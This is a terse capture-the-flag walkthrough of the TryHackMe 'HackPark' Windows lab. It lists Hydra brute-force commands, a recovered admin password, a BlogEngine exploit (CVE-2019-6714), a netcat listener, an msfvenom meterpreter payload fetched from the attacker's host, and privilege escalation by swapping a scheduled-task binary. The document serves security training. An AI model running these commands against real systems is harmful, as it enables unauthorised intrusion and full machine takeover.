THM - HackPark
Deploy the vulnerable Windows machine
- pennywise
Using Hydra to brute-force a login
gobuster dir --url http://10.10.117.53 -w directory-list-1.0.txt
http://10.10.117.53/admin
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.117.53 http-post-form "/Account/login.aspx:login=^USER^&password=^PASS^:F=failed"
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.117.53 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=bbKmJ9xxHdEFSouZb%2FJt114g7kbCU%2BaAQwAIi4deqUFdDc2%2BDOyfhbxPK%2B%2BNIs0jqf%2FsVfEDjsUlyqNHfV9qvtxjqKI%2Bxk0hB92SHyd%2FrMv8lSkz39MnOgI%2FZTUf8MkHtfySJo6nuN%2BfIreenhyC74kh2wscnkRKMUtwStKAYClr9zwW&__EVENTVALIDATION=HBnWUtjmHn9931oNnDtG22SHpD0NpHECaRk84HSrl2D8YcWVS9rjv5ZaHkUBaawrBI4SEK67XCSEm4PrceIrvncRurdqS7hnGAOprTQOqVT%2BCYiaQQdwX5Btmf1e3LIh%2BEAFsXzTN5jJFUTpssnZJ6jYywchAMPdrLGCkPjibCwERDvH&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=failed"
Compromise the machine
Admin login
login: admin password: 1qaz2wsx
CMS Version
3.3.6.0
Exploit for that version
CVE-2019-6714
https://www.exploit-db.com/exploits/46353
Place where exploit can be uploaded
10.10.117.53/admin/app/editor/editpost.cshtml
Set up listener
nc -nvlp 4443
Run revers shell
10.10.117.53/?theme=../../App_Data/files/
Get the shell
whoami
Windows Privilege Escalation
Generate payload with better shell
hacker machine
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.9.175 LPORT=4442 -f exe -o shell.exe
Expose shell.exe by local server
hacker machine
python3 -m http.server
Run lisener
msfconsole
msf6 > search multi handler
...
5 exploit/multi/handler
...
msf6 > use 5
msf6 exploit(multi/handler) > set LHOST 10.18.9.175
msf6 exploit(multi/handler) > set LPORT 4442
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
Get shell.exe
target machine
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
target machine
cd C:\Windows\Temp
dir
.\shell.exe
target machine
shell
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp
dir
.\winPEAS.bat
target machine
meterpreter > cd "c:\Program Files (x86)\SystemScheduler"
meterpreter > cp Message.exe Message.exe.back
meterpreter > rm "c:\Program Files (x86)\SystemScheduler\Message.exe"
meterpreter > cd "c:\Windows\Temp"
meterpreter > cp shell.exe "c:\Program Files (x86)\SystemScheduler\Message.exe"
exit
run
now we should get root shell